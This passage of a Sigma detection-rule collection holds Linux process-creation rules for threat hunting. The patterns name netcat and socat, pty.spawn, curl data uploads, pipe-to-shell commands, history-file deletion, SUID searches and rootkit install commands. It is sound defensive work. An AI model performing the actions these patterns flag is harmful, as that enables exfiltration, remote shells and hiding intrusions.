'/tail' 27 | selection_procfs_kthreadd: # outside containers, PID 2 == kthreadd 28 | CommandLine|contains: '/proc/2/' 29 | selection_procfs_target: 30 | CommandLine|contains: '/proc/' 31 | CommandLine|endswith: 32 | - '/cgroup' # cgroups end in ':/' outside containers 33 | - '/sched' # PID mismatch when run in containers 34 | condition: selection_tools and 1 of selection_procfs_* 35 | falsepositives: 36 | - Legitimate system administrator usage of these commands 37 | - Some container tools or deployments may use these techniques natively to determine how they proceed with execution, and will need to be filtered 38 | level: low 39 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml: -------------------------------------------------------------------------------- 1 | title: Suspicious Curl File Upload - Linux 2 | id: 
00b90cc1-17ec-402c-96ad-3a8117d7a582 3 | related: 4 | - id: 00bca14a-df4e-4649-9054-3f2aa676bc04 5 | type: derived 6 | status: experimental 7 | description: Detects a suspicious curl process start the adds a file to a web request 8 | references: 9 | - https://twitter.com/d1r4c/status/1279042657508081664 10 | - https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76 11 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file 12 | - https://curl.se/docs/manpage.html 13 | - https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html 14 | author: Nasreddine Bencherchali (Nextron Systems), Cedric MAURUGEON (Update) 15 | date: 2022/09/15 16 | modified: 2023/05/02 17 | tags: 18 | - attack.exfiltration 19 | - attack.t1567 20 | - attack.t1105 21 | logsource: 22 | category: process_creation 23 | product: linux 24 | detection: 25 | selection_img: 26 | Image|endswith: '/curl' 27 | selection_cli: 28 | - CommandLine|contains: 29 | - ' --form' # Also covers the "--form-string" 30 | - ' --upload-file ' 31 | - ' --data ' 32 | - ' --data-' # For flags like: "--data-ascii", "--data-binary", "--data-raw", "--data-urlencode" 33 | - CommandLine|re: '\s-[FTd]\s' # We use regex to ensure a case sensitive argument detection 34 | filter_optional_localhost: 35 | CommandLine|contains: 36 | - '://localhost' 37 | - '://127.0.0.1' 38 | condition: all of selection_* and not 1 of filter_optional_* 39 | falsepositives: 40 | - Scripts created by developers and admins 41 | level: medium 42 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_susp_curl_useragent.yml: -------------------------------------------------------------------------------- 1 | title: Suspicious Curl Change User Agents - Linux 2 | id: b86d356d-6093-443d-971c-9b07db583c68 3 | related: 4 | - 
id: 3286d37a-00fd-41c2-a624-a672dcd34e60 5 | type: derived 6 | status: test 7 | description: Detects a suspicious curl process start on linux with set useragent options 8 | references: 9 | - https://curl.se/docs/manpage.html 10 | author: Nasreddine Bencherchali (Nextron Systems) 11 | date: 2022/09/15 12 | tags: 13 | - attack.command_and_control 14 | - attack.t1071.001 15 | logsource: 16 | category: process_creation 17 | product: linux 18 | detection: 19 | selection: 20 | Image|endswith: '/curl' 21 | CommandLine|contains: 22 | - ' -A ' 23 | - ' --user-agent ' 24 | condition: selection 25 | falsepositives: 26 | - Scripts created by developers and admins 27 | - Administrative activity 28 | level: medium 29 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_susp_dockerenv_recon.yml: -------------------------------------------------------------------------------- 1 | title: Docker Container Discovery Via Dockerenv Listing 2 | id: 11701de9-d5a5-44aa-8238-84252f131895 3 | status: experimental 4 | description: Detects listing or file reading of ".dockerenv" which can be a sing of potential container discovery 5 | references: 6 | - https://blog.skyplabs.net/posts/container-detection/ 7 | - https://stackoverflow.com/questions/20010199/how-to-determine-if-a-process-runs-inside-lxc-docker 8 | tags: 9 | - attack.discovery 10 | - attack.t1082 11 | author: Seth Hanford 12 | date: 2023/08/23 13 | logsource: 14 | category: process_creation 15 | product: linux 16 | detection: 17 | selection: 18 | Image|endswith: 19 | # Note: add additional tools and utilities to increase coverage 20 | - '/cat' 21 | - '/dir' 22 | - '/find' 23 | - '/ls' 24 | - '/stat' 25 | - '/test' 26 | - 'grep' 27 | CommandLine|endswith: '.dockerenv' 28 | condition: selection 29 | falsepositives: 30 | - Legitimate system administrator usage of these commands 31 | - Some container tools or deployments may use these techniques natively to 
determine how they proceed with execution, and will need to be filtered 32 | level: low 33 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_susp_execution_tmp_folder.yml: -------------------------------------------------------------------------------- 1 | title: Potentially Suspicious Execution From Tmp Folder 2 | id: 312b42b1-bded-4441-8b58-163a3af58775 3 | status: experimental 4 | description: Detects a potentially suspicious execution of a process located in the '/tmp/' folder 5 | references: 6 | - https://blogs.jpcert.or.jp/en/2023/05/gobrat.html 7 | - https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/ 8 | - https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection 9 | - https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection 10 | author: Joseliyo Sanchez, @Joseliyo_Jstnk 11 | date: 2023/06/02 12 | tags: 13 | - attack.defense_evasion 14 | - attack.t1036 15 | logsource: 16 | product: linux 17 | category: process_creation 18 | detection: 19 | selection: 20 | Image|startswith: '/tmp/' 21 | condition: selection 22 | falsepositives: 23 | - Unknown 24 | level: high 25 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_susp_find_execution.yml: -------------------------------------------------------------------------------- 1 | title: Potential Discovery Activity Using Find - Linux 2 | id: 8344c0e5-5783-47cc-9cf9-a0f7fd03e6cf 3 | related: 4 | - id: 85de3a19-b675-4a51-bfc6-b11a5186c971 5 | type: similar 6 | status: test 7 | description: Detects usage of "find" binary in a suspicious manner to perform discovery 8 | references: 9 | - https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes 10 | author: Nasreddine Bencherchali (Nextron Systems) 11 | date: 2022/12/28 12 | tags: 13 | - 
attack.discovery 14 | - attack.t1083 15 | logsource: 16 | category: process_creation 17 | product: linux 18 | detection: 19 | selection: 20 | Image|endswith: '/find' 21 | CommandLine|contains: 22 | - '-perm -4000' 23 | - '-perm -2000' 24 | - '-perm 0777' 25 | - '-perm -222' 26 | - '-perm -o w' 27 | - '-perm -o x' 28 | - '-perm -u=s' 29 | - '-perm -g=s' 30 | condition: selection 31 | falsepositives: 32 | - Unknown 33 | level: medium 34 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_susp_git_clone.yml: -------------------------------------------------------------------------------- 1 | title: Suspicious Git Clone - Linux 2 | id: cfec9d29-64ec-4a0f-9ffe-0fdb856d5446 3 | status: test 4 | description: Detects execution of "git" in order to clone a remote repository that contain suspicious keywords which might be suspicious 5 | references: 6 | - https://gist.githubusercontent.com/MichaelKoczwara/12faba9c061c12b5814b711166de8c2f/raw/e2068486692897b620c25fde1ea258c8218fe3d3/history.txt 7 | author: Nasreddine Bencherchali (Nextron Systems) 8 | date: 2023/01/03 9 | modified: 2023/01/05 10 | tags: 11 | - attack.reconnaissance 12 | - attack.t1593.003 13 | logsource: 14 | category: process_creation 15 | product: linux 16 | detection: 17 | selection_img: 18 | Image|endswith: '/git' 19 | CommandLine|contains: ' clone ' 20 | selection_keyword: 21 | CommandLine|contains: 22 | # Add more suspicious keywords 23 | - 'exploit' 24 | - 'Vulns' 25 | - 'vulnerability' 26 | - 'RCE' 27 | - 'RemoteCodeExecution' 28 | - 'Invoke-' 29 | - 'CVE-' 30 | - 'poc-' 31 | - 'ProofOfConcept' 32 | # Add more vuln names 33 | - 'proxyshell' 34 | - 'log4shell' 35 | - 'eternalblue' 36 | - 'eternal-blue' 37 | - 'MS17-' 38 | condition: all of selection_* 39 | falsepositives: 40 | - Unknown 41 | level: medium 42 | -------------------------------------------------------------------------------- 
/rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml: -------------------------------------------------------------------------------- 1 | title: History File Deletion 2 | id: 1182f3b3-e716-4efa-99ab-d2685d04360f 3 | status: test 4 | description: Detects events in which a history file gets deleted, e.g. the ~/bash_history to remove traces of malicious activity 5 | references: 6 | - https://github.com/sleventyeleven/linuxprivchecker/ 7 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md 8 | author: Florian Roth (Nextron Systems) 9 | date: 2022/06/20 10 | modified: 2022/09/15 11 | tags: 12 | - attack.impact 13 | - attack.t1565.001 14 | logsource: 15 | category: process_creation 16 | product: linux 17 | detection: 18 | selection: 19 | Image|endswith: 20 | - '/rm' 21 | - '/unlink' 22 | - '/shred' 23 | selection_history: 24 | - CommandLine|contains: 25 | - '/.bash_history' 26 | - '/.zsh_history' 27 | - CommandLine|endswith: 28 | - '_history' 29 | - '.history' 30 | - 'zhistory' 31 | condition: all of selection* 32 | falsepositives: 33 | - Legitimate administration activities 34 | level: high 35 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml: -------------------------------------------------------------------------------- 1 | title: Print History File Contents 2 | id: d7821ff1-4527-4e33-9f84-d0d57fa2fb66 3 | status: test 4 | description: Detects events in which someone prints the contents of history files to the commandline or redirects it to a file for reconnaissance 5 | references: 6 | - https://github.com/sleventyeleven/linuxprivchecker/ 7 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md 8 | author: Florian Roth (Nextron Systems) 9 | date: 2022/06/20 10 | modified: 2022/09/15 11 | tags: 12 | - 
attack.reconnaissance 13 | - attack.t1592.004 14 | logsource: 15 | category: process_creation 16 | product: linux 17 | detection: 18 | selection: 19 | Image|endswith: 20 | - '/cat' 21 | - '/head' 22 | - '/tail' 23 | - '/more' 24 | selection_history: 25 | - CommandLine|contains: 26 | - '/.bash_history' 27 | - '/.zsh_history' 28 | - CommandLine|endswith: 29 | - '_history' 30 | - '.history' 31 | - 'zhistory' 32 | condition: all of selection* 33 | falsepositives: 34 | - Legitimate administration activities 35 | level: medium 36 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_susp_inod_listing.yml: -------------------------------------------------------------------------------- 1 | title: Potential Container Discovery Via Inodes Listing 2 | id: 43e26eb5-cd58-48d1-8ce9-a273f5d298d8 3 | status: experimental 4 | description: Detects listing of the inodes of the "/" directory to determine if the we are running inside of a container. 
5 | references: 6 | - https://blog.skyplabs.net/posts/container-detection/ 7 | - https://stackoverflow.com/questions/20010199/how-to-determine-if-a-process-runs-inside-lxc-docker 8 | tags: 9 | - attack.discovery 10 | - attack.t1082 11 | author: Seth Hanford 12 | date: 2023/08/23 13 | logsource: 14 | category: process_creation 15 | product: linux 16 | detection: 17 | selection: 18 | # inode outside containers low, inside high 19 | Image|endswith: '/ls' 20 | CommandLine|contains|all: 21 | - ' -*i' # -i finds inode number 22 | - ' -*d' # -d gets directory itself, not contents 23 | CommandLine|endswith: ' /' 24 | condition: selection 25 | falsepositives: 26 | - Legitimate system administrator usage of these commands 27 | - Some container tools or deployments may use these techniques natively to determine how they proceed with execution, and will need to be filtered 28 | level: low 29 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_susp_interactive_bash.yml: -------------------------------------------------------------------------------- 1 | title: Interactive Bash Suspicious Children 2 | id: ea3ecad2-db86-4a89-ad0b-132a10d2db55 3 | status: test 4 | description: Detects suspicious interactive bash as a parent to rather uncommon child processes 5 | references: 6 | - Internal Research 7 | author: Florian Roth (Nextron Systems) 8 | date: 2022/03/14 9 | tags: 10 | - attack.execution 11 | - attack.defense_evasion 12 | - attack.t1059.004 13 | - attack.t1036 14 | logsource: 15 | product: linux 16 | category: process_creation 17 | detection: 18 | selection: 19 | ParentCommandLine: 'bash -i' 20 | anomaly1: 21 | CommandLine|contains: 22 | - '-c import ' 23 | - 'base64' 24 | - 'pty.spawn' 25 | anomaly2: 26 | Image|endswith: 27 | - 'whoami' 28 | - 'iptables' 29 | - '/ncat' 30 | - '/nc' 31 | - '/netcat' 32 | condition: selection and 1 of anomaly* 33 | falsepositives: 34 | - Legitimate software that 
uses these patterns 35 | level: medium 36 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_susp_java_children.yml: -------------------------------------------------------------------------------- 1 | title: Suspicious Java Children Processes 2 | id: d292e0af-9a18-420c-9525-ec0ac3936892 3 | status: test 4 | description: Detects java process spawning suspicious children 5 | references: 6 | - https://www.tecmint.com/different-types-of-linux-shells/ 7 | author: Nasreddine Bencherchali (Nextron Systems) 8 | date: 2022/06/03 9 | tags: 10 | - attack.execution 11 | - attack.t1059 12 | logsource: 13 | category: process_creation 14 | product: linux 15 | detection: 16 | selection: 17 | ParentImage|endswith: '/java' 18 | CommandLine|contains: 19 | - '/bin/sh' 20 | - 'bash' 21 | - 'dash' 22 | - 'ksh' 23 | - 'zsh' 24 | - 'csh' 25 | - 'fish' 26 | - 'curl' 27 | - 'wget' 28 | - 'python' 29 | condition: selection 30 | falsepositives: 31 | - Unknown 32 | level: high 33 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_susp_network_utilities_execution.yml: -------------------------------------------------------------------------------- 1 | title: Linux Network Service Scanning Tools Execution 2 | id: 3e102cd9-a70d-4a7a-9508-403963092f31 3 | status: test 4 | description: Detects execution of network scanning and reconnaisance tools. These tools can be used for the enumeration of local or remote network services for example. 
5 | references: 6 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md 7 | - https://github.com/projectdiscovery/naabu 8 | - https://github.com/Tib3rius/AutoRecon 9 | author: Alejandro Ortuno, oscd.community, Georg Lauenstein (sure[secure]) 10 | date: 2020/10/21 11 | modified: 2023/10/25 12 | tags: 13 | - attack.discovery 14 | - attack.t1046 15 | logsource: 16 | category: process_creation 17 | product: linux 18 | detection: 19 | selection_netcat: 20 | Image|endswith: 21 | - '/nc' 22 | - '/ncat' 23 | - '/netcat' 24 | - '/socat' 25 | selection_network_scanning_tools: 26 | Image|endswith: 27 | - '/autorecon' 28 | - '/hping' 29 | - '/hping2' 30 | - '/hping3' 31 | - '/naabu' 32 | - '/nmap' 33 | - '/nping' 34 | - '/telnet' # could be wget, curl, ssh, many things. basically everything that is able to do network connection. consider fine tuning 35 | filter_main_netcat_listen_flag: 36 | CommandLine|contains: 37 | - ' --listen ' 38 | - ' -l ' 39 | condition: (selection_netcat and not filter_main_netcat_listen_flag) or selection_network_scanning_tools 40 | falsepositives: 41 | - Legitimate administration activities 42 | level: low 43 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_susp_pipe_shell.yml: -------------------------------------------------------------------------------- 1 | title: Linux Shell Pipe to Shell 2 | id: 880973f3-9708-491c-a77b-2a35a1921158 3 | status: test 4 | description: Detects suspicious process command line that starts with a shell that executes something and finally gets piped into another shell 5 | references: 6 | - Internal Research 7 | author: Florian Roth (Nextron Systems) 8 | date: 2022/03/14 9 | modified: 2022/07/26 10 | tags: 11 | - attack.defense_evasion 12 | - attack.t1140 13 | logsource: 14 | product: linux 15 | category: process_creation 16 | detection: 17 | selection: 18 | 
CommandLine|startswith: 19 | - 'sh -c ' 20 | - 'bash -c ' 21 | selection_exec: 22 | - CommandLine|contains: 23 | - '| bash ' 24 | - '| sh ' 25 | - '|bash ' 26 | - '|sh ' 27 | - CommandLine|endswith: 28 | - '| bash' 29 | - '| sh' 30 | - '|bash' 31 | - ' |sh' 32 | condition: all of selection* 33 | falsepositives: 34 | - Legitimate software that uses these patterns 35 | level: medium 36 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_susp_recon_indicators.yml: -------------------------------------------------------------------------------- 1 | title: Linux Recon Indicators 2 | id: 0cf7a157-8879-41a2-8f55-388dd23746b7 3 | status: test 4 | description: Detects events with patterns found in commands used for reconnaissance on linux systems 5 | references: 6 | - https://github.com/sleventyeleven/linuxprivchecker/blob/0d701080bbf92efd464e97d71a70f97c6f2cd658/linuxprivchecker.py 7 | author: Florian Roth (Nextron Systems) 8 | date: 2022/06/20 9 | tags: 10 | - attack.reconnaissance 11 | - attack.t1592.004 12 | - attack.credential_access 13 | - attack.t1552.001 14 | logsource: 15 | category: process_creation 16 | product: linux 17 | detection: 18 | selection: 19 | CommandLine|contains: 20 | - ' -name .htpasswd' 21 | - ' -perm -4000 ' 22 | condition: selection 23 | falsepositives: 24 | - Legitimate administration activities 25 | level: high 26 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_susp_sensitive_file_access.yml: -------------------------------------------------------------------------------- 1 | title: Potential Suspicious Change To Sensitive/Critical Files 2 | id: 86157017-c2b1-4d4a-8c33-93b8e67e4af4 3 | status: experimental 4 | description: Detects changes of sensitive and critical files. Monitors files that you don't expect to change without planning on Linux system. 
5 | references: 6 | - https://docs.microsoft.com/en-us/azure/defender-for-cloud/file-integrity-monitoring-overview#which-files-should-i-monitor 7 | author: '@d4ns4n_ (Wuerth-Phoenix)' 8 | date: 2023/05/30 9 | tags: 10 | - attack.impact 11 | - attack.t1565.001 12 | logsource: 13 | category: process_creation 14 | product: linux 15 | detection: 16 | selection_img_1: 17 | Image|endswith: 18 | - '/cat' 19 | - '/echo' 20 | - '/grep' 21 | - '/head' 22 | - '/more' 23 | - '/tail' 24 | CommandLine|contains: '>' 25 | selection_img_2: 26 | Image|endswith: 27 | - '/emacs' 28 | - '/nano' 29 | - '/sed' 30 | - '/vi' 31 | - '/vim' 32 | selection_paths: 33 | CommandLine|contains: 34 | - '/bin/login' 35 | - '/bin/passwd' 36 | - '/boot/' 37 | - '/etc/*.conf' 38 | - '/etc/cron.' # Covers different cron config files "daily", "hourly", etc. 39 | - '/etc/crontab' 40 | - '/etc/hosts' 41 | - '/etc/init.d' 42 | - '/etc/sudoers' 43 | - '/opt/bin/' 44 | - '/sbin' # Covers: '/opt/sbin', '/usr/local/sbin/', '/usr/sbin/' 45 | - '/usr/bin/' 46 | - '/usr/local/bin/' 47 | condition: 1 of selection_img_* and selection_paths 48 | falsepositives: 49 | - Some false positives are to be expected on user or administrator machines. Apply additional filters as needed. 
50 | level: medium 51 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_susp_shell_child_process_from_parent_tmp_folder.yml: -------------------------------------------------------------------------------- 1 | title: Shell Execution Of Process Located In Tmp Directory 2 | id: 2fade0b6-7423-4835-9d4f-335b39b83867 3 | status: experimental 4 | description: Detects execution of shells from a parent process located in a temporary (/tmp) directory 5 | references: 6 | - https://blogs.jpcert.or.jp/en/2023/05/gobrat.html 7 | - https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/ 8 | - https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection 9 | - https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection 10 | author: Joseliyo Sanchez, @Joseliyo_Jstnk 11 | date: 2023/06/02 12 | tags: 13 | - attack.execution 14 | logsource: 15 | product: linux 16 | category: process_creation 17 | detection: 18 | selection: 19 | ParentImage|startswith: '/tmp/' 20 | Image|endswith: 21 | - '/bash' 22 | - '/csh' 23 | - '/dash' 24 | - '/fish' 25 | - '/ksh' 26 | - '/sh' 27 | - '/zsh' 28 | condition: selection 29 | falsepositives: 30 | - Unknown 31 | level: high 32 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_susp_shell_script_exec_from_susp_location.yml: -------------------------------------------------------------------------------- 1 | title: Execution Of Script Located In Potentially Suspicious Directory 2 | id: 30bcce26-51c5-49f2-99c8-7b59e3af36c7 3 | status: experimental 4 | description: Detects executions of scripts located in potentially suspicious locations such as "/tmp" via a shell such as "bash", "sh", etc. 
5 | references: 6 | - https://blogs.jpcert.or.jp/en/2023/05/gobrat.html 7 | - https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/ 8 | - https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection 9 | - https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection 10 | author: Joseliyo Sanchez, @Joseliyo_Jstnk 11 | date: 2023/06/02 12 | tags: 13 | - attack.execution 14 | logsource: 15 | product: linux 16 | category: process_creation 17 | detection: 18 | selection_img: 19 | Image|endswith: 20 | - '/bash' 21 | - '/csh' 22 | - '/dash' 23 | - '/fish' 24 | - '/ksh' 25 | - '/sh' 26 | - '/zsh' 27 | selection_flag: 28 | CommandLine|contains: ' -c ' 29 | selection_paths: 30 | # Note: Add more suspicious paths 31 | CommandLine|contains: '/tmp/' 32 | condition: all of selection_* 33 | falsepositives: 34 | - Unknown 35 | level: medium 36 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_system_info_discovery.yml: -------------------------------------------------------------------------------- 1 | title: System Information Discovery 2 | id: 42df45e7-e6e9-43b5-8f26-bec5b39cc239 3 | status: stable 4 | description: Detects system information discovery commands 5 | references: 6 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md 7 | author: Ömer Günal, oscd.community 8 | date: 2020/10/08 9 | modified: 2021/09/14 10 | tags: 11 | - attack.discovery 12 | - attack.t1082 13 | logsource: 14 | product: linux 15 | category: process_creation 16 | detection: 17 | selection: 18 | Image|endswith: 19 | - '/uname' 20 | - '/hostname' 21 | - '/uptime' 22 | - '/lspci' 23 | - '/dmidecode' 24 | - '/lscpu' 25 | - '/lsmod' 26 | condition: selection 27 | falsepositives: 28 | - Legitimate administration activities 29 | level: informational 30 | 
-------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_system_network_connections_discovery.yml: -------------------------------------------------------------------------------- 1 | title: System Network Connections Discovery - Linux 2 | id: 4c519226-f0cd-4471-bd2f-6fbb2bb68a79 3 | status: test 4 | description: Detects usage of system utilities to discover system network connections 5 | references: 6 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md 7 | author: Daniil Yugoslavskiy, oscd.community 8 | date: 2020/10/19 9 | modified: 2023/01/17 10 | tags: 11 | - attack.discovery 12 | - attack.t1049 13 | logsource: 14 | category: process_creation 15 | product: linux 16 | detection: 17 | selection: 18 | Image|endswith: 19 | - '/who' 20 | - '/w' 21 | - '/last' 22 | - '/lsof' 23 | - '/netstat' 24 | filter_landscape_sysinfo: 25 | ParentCommandLine|contains: '/usr/bin/landscape-sysinfo' 26 | Image|endswith: '/who' 27 | condition: selection and not 1 of filter_* 28 | falsepositives: 29 | - Legitimate activities 30 | level: low 31 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_system_network_discovery.yml: -------------------------------------------------------------------------------- 1 | title: System Network Discovery - Linux 2 | id: e7bd1cfa-b446-4c88-8afb-403bcd79e3fa 3 | status: test 4 | description: Detects enumeration of local network configuration 5 | references: 6 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md 7 | author: Ömer Günal and remotephone, oscd.community 8 | date: 2020/10/06 9 | modified: 2022/09/15 10 | tags: 11 | - attack.discovery 12 | - attack.t1016 13 | logsource: 14 | category: process_creation 15 | product: linux 16 | detection: 17 | selection_img: 18 | 
Image|endswith: 19 | - '/firewall-cmd' 20 | - '/ufw' 21 | - '/iptables' 22 | - '/netstat' 23 | - '/ss' 24 | - '/ip' 25 | - '/ifconfig' 26 | - '/systemd-resolve' 27 | - '/route' 28 | selection_cli: 29 | CommandLine|contains: '/etc/resolv.conf' 30 | condition: 1 of selection_* 31 | falsepositives: 32 | - Legitimate administration activities 33 | level: informational 34 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_touch_susp.yml: -------------------------------------------------------------------------------- 1 | title: Touch Suspicious Service File 2 | id: 31545105-3444-4584-bebf-c466353230d2 3 | status: experimental 4 | description: Detects usage of the "touch" process in service file. 5 | references: 6 | - https://blogs.blackberry.com/ 7 | - https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144 8 | author: Joseliyo Sanchez, @Joseliyo_Jstnk 9 | date: 2023/01/11 10 | tags: 11 | - attack.defense_evasion 12 | - attack.t1070.006 13 | logsource: 14 | product: linux 15 | category: process_creation 16 | detection: 17 | selection: 18 | Image|endswith: '/touch' 19 | CommandLine|contains: ' -t ' 20 | CommandLine|endswith: '.service' 21 | condition: selection 22 | falsepositives: 23 | - Admin changing date of files. 
24 | level: medium 25 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml: -------------------------------------------------------------------------------- 1 | title: Triple Cross eBPF Rootkit Execve Hijack 2 | id: 0326c3c8-7803-4a0f-8c5c-368f747f7c3e 3 | status: test 4 | description: Detects execution of a the file "execve_hijack" which is used by the Triple Cross rootkit as a way to elevate privileges 5 | references: 6 | - https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/src/helpers/execve_hijack.c#L275 7 | author: Nasreddine Bencherchali (Nextron Systems) 8 | date: 2022/07/05 9 | tags: 10 | - attack.defense_evasion 11 | - attack.privilege_escalation 12 | logsource: 13 | category: process_creation 14 | product: linux 15 | detection: 16 | selection: 17 | Image|endswith: '/sudo' 18 | CommandLine|contains: 'execve_hijack' 19 | condition: selection 20 | falsepositives: 21 | - Unlikely 22 | level: high 23 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_install.yml: -------------------------------------------------------------------------------- 1 | title: Triple Cross eBPF Rootkit Install Commands 2 | id: 22236d75-d5a0-4287-bf06-c93b1770860f 3 | status: test 4 | description: Detects default install commands of the Triple Cross eBPF rootkit based on the "deployer.sh" script 5 | references: 6 | - https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/apps/deployer.sh 7 | author: Nasreddine Bencherchali (Nextron Systems) 8 | date: 2022/07/05 9 | tags: 10 | - attack.defense_evasion 11 | - attack.t1014 12 | logsource: 13 | category: process_creation 14 | product: linux 15 | detection: 16 | selection: 17 | Image|endswith: '/sudo' 18 | CommandLine|contains|all: 19 | - ' tc ' 20 | - ' enp0s3 ' 
21 | CommandLine|contains: 22 | - ' qdisc ' 23 | - ' filter ' 24 | condition: selection 25 | falsepositives: 26 | - Unlikely 27 | level: high 28 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_userdel.yml: -------------------------------------------------------------------------------- 1 | title: User Has Been Deleted Via Userdel 2 | id: 08f26069-6f80-474b-8d1f-d971c6fedea0 3 | status: test 4 | description: Detects execution of the "userdel" binary. Which is used to delete a user account and related files. This is sometimes abused by threat actors in order to cover their tracks 5 | references: 6 | - https://linuxize.com/post/how-to-delete-group-in-linux/ 7 | - https://www.cyberciti.biz/faq/linux-remove-user-command/ 8 | - https://www.cybrary.it/blog/0p3n/linux-commands-used-attackers/ 9 | - https://linux.die.net/man/8/userdel 10 | author: Tuan Le (NCSGroup) 11 | date: 2022/12/26 12 | tags: 13 | - attack.impact 14 | - attack.t1531 15 | logsource: 16 | product: linux 17 | category: process_creation 18 | detection: 19 | selection: 20 | Image|endswith: '/userdel' 21 | condition: selection 22 | falsepositives: 23 | - Legitimate administrator activities 24 | level: medium 25 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_usermod_susp_group.yml: -------------------------------------------------------------------------------- 1 | title: User Added To Root/Sudoers Group Using Usermod 2 | id: 6a50f16c-3b7b-42d1-b081-0fdd3ba70a73 3 | status: test 4 | description: Detects usage of the "usermod" binary to add users add users to the root or suoders groups 5 | references: 6 | - https://pberba.github.io/security/2021/11/23/linux-threat-hunting-for-persistence-account-creation-manipulation/ 7 | - https://www.configserverfirewall.com/ubuntu-linux/ubuntu-add-user-to-root-group/ 8 | author: TuanLe (GTSC) 9 | date: 
2022/12/21 10 | tags: 11 | - attack.privilege_escalation 12 | - attack.persistence 13 | logsource: 14 | product: linux 15 | category: process_creation 16 | detection: 17 | selection: 18 | Image|endswith: '/usermod' 19 | CommandLine|contains: 20 | - '-aG root' 21 | - '-aG sudoers' 22 | condition: selection 23 | falsepositives: 24 | - Legitimate administrator activities 25 | level: medium 26 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_webshell_detection.yml: -------------------------------------------------------------------------------- 1 | title: Linux Webshell Indicators 2 | id: 818f7b24-0fba-4c49-a073-8b755573b9c7 3 | status: test 4 | description: Detects suspicious sub processes of web server processes 5 | references: 6 | - https://www.acunetix.com/blog/articles/web-shells-101-using-php-introduction-web-shells-part-2/ 7 | - https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF 8 | author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) 9 | date: 2021/10/15 10 | modified: 2022/12/28 11 | tags: 12 | - attack.persistence 13 | - attack.t1505.003 14 | logsource: 15 | product: linux 16 | category: process_creation 17 | detection: 18 | selection_general: 19 | ParentImage|endswith: 20 | - '/httpd' 21 | - '/lighttpd' 22 | - '/nginx' 23 | - '/apache2' 24 | - '/node' 25 | - '/caddy' 26 | selection_tomcat: 27 | ParentCommandLine|contains|all: 28 | - '/bin/java' 29 | - 'tomcat' 30 | selection_websphere: # ? 
